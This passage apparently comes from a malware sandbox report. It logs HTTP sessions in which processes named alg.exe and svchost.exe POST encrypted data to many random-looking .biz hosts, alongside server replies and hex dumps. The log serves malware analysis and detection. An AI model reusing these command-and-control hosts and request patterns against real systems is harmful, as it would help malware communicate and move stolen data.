                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=0ba3b42b59b9ffe390ae9374c1f369ed|8.46.123.33|1728394124|1728394124|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              34192.168.2.44982918.141.10.107802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.835432053 CEST349OUTPOST /vcjmpg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.835457087 CEST778OUTData Raw: 72 e7 de 25 3a ea fd 8e fe 02 00 00 80 0f 0b 07 d1 25 89 f3 30 6d de 4e 0f ce 3d 54 fd 67 b6 71 d8 8d bc fb 6b ab f4 06 93 a3 e7 68 30 b9 2a 85 d8 35 f6 06 c8 4e 61 41 12 49 17 bc 70 46 3f 09 03 cb 70 ad e5 b1 39 72 46 01 8b 53 49 85 58 97 b6 fe
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: r%:%0mN=Tgqkh0*5NaAIpF?p9rFSIXIJ8\ac::ot+/Et=MM693x!W(z\k5F,5T\Ss:$>~^j**l7otzR'UwS)9OfjE:.#
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.153393030 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=4393a9137aaec9a5beef330ee835251b|8.46.123.33|1728394124|1728394124|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              35192.168.2.44983518.208.156.248804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.474302053 CEST346OUTPOST /luaao HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.474328995 CEST786OUTData Raw: ad bd 00 0f d0 74 c3 55 06 03 00 00 91 9f a1 99 f2 3e 5a 84 33 93 51 31 e9 ba b5 ec 8b cd 47 31 b0 1e 2f ea dd ef 7c 7e e4 8b c1 0d 0f 13 95 20 e3 7a ef c5 d3 b0 be 75 e5 2c 57 1d b0 83 5e 80 4e 66 91 91 4a c1 6e 13 6d 27 bf a6 92 89 00 09 1c 10
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: tU>Z3Q1G1/|~ zu,W^NfJnm'DKMWPoE/*jU}aXX5%$m+4c{D=$!fv>B>Q((&0Oa.>R'@Sn?!4`5HuI" dZJ,;fk91I&zTezp'I
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.952984095 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=dd9d6ec2d28fa711b094b6e5603eb1ce|8.46.123.33|1728394124|1728394124|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              36192.168.2.449839208.100.26.245804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.019335032 CEST355OUTPOST /ewjlslyiisf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.019351959 CEST786OUTData Raw: f0 7b 4b 77 4d 29 2a 5c 06 03 00 00 17 96 4a 69 88 4d b8 db 6c f2 ea 8c 07 f7 0b e9 3b 3b 8a ad ca aa 8e ad 50 93 4b 7f 4b 6b b7 e5 b9 78 74 43 08 e1 63 fc 3f f2 3f 87 c4 4c ee d0 d8 ed f8 56 eb bb 2c 73 98 45 c5 19 9a 4f 0d 0d ab ff b3 e7 1b 49
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {KwM)*\JiMl;;PKKkxtCc??LV,sEOI*b%#3joC(]etlEWhkLbquPYU<V6)VuQ4m_)0b jJ80@s7b4]jQ!
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.650996923 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.698288918 CEST359OUTPOST /fnaptxelbkqpwkk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.698338032 CEST786OUTData Raw: fe 3d d6 7e de a3 d9 18 06 03 00 00 bb 8e dd 84 a6 75 a9 9b 26 7a c5 48 27 fa c8 b9 be 6e c9 57 1f dc 21 b8 e6 0c 2f ca a8 15 f9 79 82 04 44 8e 1e 7d fb 6a 12 9e 3e e8 8b a3 ac 90 25 b6 9d 7c 9c da 2a c5 15 1b ea 3a 68 3a b3 91 b6 d4 e3 03 9c ef
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: =~u&zH'nW!/yD}j>%|*:h:|`Jj~;x|lRA-Tu\/zi4@u)~#F$4Yk[lWK8wY~M"}<FMGB<]Gy<zH4USh\
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.828318119 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              37192.168.2.449843172.234.222.138802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.658457994 CEST357OUTPOST /wtdwobcctwkccpvu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.658483028 CEST778OUTData Raw: 74 82 12 aa bf d6 ba 02 fe 02 00 00 b2 e1 23 5e 4b b6 92 1c 50 30 31 ad 13 46 cd 5e 39 89 54 62 0c c2 94 25 fd 85 4e 1f 30 0f 23 80 4d ae 4a 0b e6 57 fa 8e 50 16 c0 60 7e 57 c4 cb 34 09 b1 6f 86 44 fe 39 17 0b 09 ee 0b dd b4 ac 62 e3 0d 7c c0 84
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t#^KP01F^9Tb%N0#MJWP`~W4oD9b|2l]hDn^FT}E$RP~!MTsPWJr~[q}mJ51V"RRo,G{c]u8fYA38J\f/b;oW)


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              38192.168.2.44984813.251.16.150804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.950036049 CEST357OUTPOST /vyoggvtcvxheoco HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.950057030 CEST786OUTData Raw: 67 35 0a 82 27 40 4b d4 06 03 00 00 d7 f9 da 98 ae 2c a2 4c f1 04 83 13 7d c4 8f fb 01 7a f8 0e d0 01 25 93 cd 1c 47 8a 29 0f 50 d5 b3 97 50 a1 56 1c b7 dd 89 d6 0f bf df 54 45 24 c3 6a 9d 3e 9b 3e b6 e3 6a 6a ff ab c9 42 b9 b4 db 0b 53 cd 00 9b
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: g5'@K,L}z%G)PPVTE$j>>jjBSB+,uEZ)_:<nr'!#;U'g T":pAWb^SI2^BX>Cwen`4x**H(B4]t)=5hz;QUB[E*E^T
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.276556015 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=07ddee4a01ffef4c3b8ebffc27f4a384|8.46.123.33|1728394127|1728394127|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              39192.168.2.449851172.234.222.138802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.512016058 CEST342OUTPOST /d HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.512027979 CEST778OUTData Raw: a0 1e 05 1b a7 0b 78 56 fe 02 00 00 89 49 39 d1 3e e9 7c ce 6d f4 35 7f c8 7a 27 3b d3 94 cd dc 1c 52 2e a0 b7 e5 4b 4b 2f 8b 1f 0b a9 2a 84 02 83 80 bd dd 82 77 30 46 a8 ad f5 f6 fc b7 b9 ae 9f 8d 25 e9 7a 1a ee 44 69 55 40 85 a5 bd da 11 26 a0
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: xVI9>|m5z';R.KK/*w0F%zDiU@&:Q' /"|/,,y\|HAP1>,GqKNm1 1d+H_uFdxuhJ45xNOAFZh})$v2p-};2


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              40192.168.2.44985744.221.84.105804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.385170937 CEST352OUTPOST /qjuvsft HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.385171890 CEST786OUTData Raw: 90 be e7 00 eb b2 35 d9 06 03 00 00 f0 7c 09 7a db 6d 43 bc fb 20 04 07 66 f1 ad c4 7a 37 a8 f2 d4 a8 cc c9 96 e2 d6 30 d9 03 96 47 78 d3 af f6 f3 be 63 5a f0 46 2b 00 0b 43 70 63 08 29 ec c8 3b 66 86 15 f5 96 35 2b fe e3 45 90 9e 36 91 b9 30 ac
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 5|zmC fz70GxcZF+Cpc);f5+E60O3sV|3J"qC;9`~DKtAfA!" n'I;W L.l*\'4/K|^.`n~ckWsDo=AO*<Q}KEA2nAc'}iW
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.873085022 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=4611861d879b4a485cfc52167a57b3aa|8.46.123.33|1728394127|1728394127|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              41192.168.2.44985834.246.200.160802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.386012077 CEST346OUTPOST /bvee HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.386035919 CEST778OUTData Raw: 90 56 a6 40 83 72 af 49 fe 02 00 00 ee 7f 1c f5 6d 2a c9 4d 91 09 26 22 98 c4 67 9b 90 3e 7f 97 5c 1a dd 15 36 f7 ee a4 18 b8 d4 01 97 fe 23 9d c0 b5 3c 7a f3 d5 23 26 af d6 22 b0 c8 95 7a ce e0 4f f1 b0 81 38 11 50 9b ff dc c1 9c 3d 8c 38 9b 31
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: V@rIm*M&"g>\6#<z#&"zO8P=810ktY.B\C)~YtFsD.QWkf@N|J[tF#Y3.;Z6p,9\ci^5B{W )5]QB<lc"N|7
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.153779030 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=fb58dac2d19c3097f52c26e5f09d0bb4|8.46.123.33|1728394128|1728394128|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              42192.168.2.44986454.244.188.177804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.117265940 CEST356OUTPOST /nvddaclxpive HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
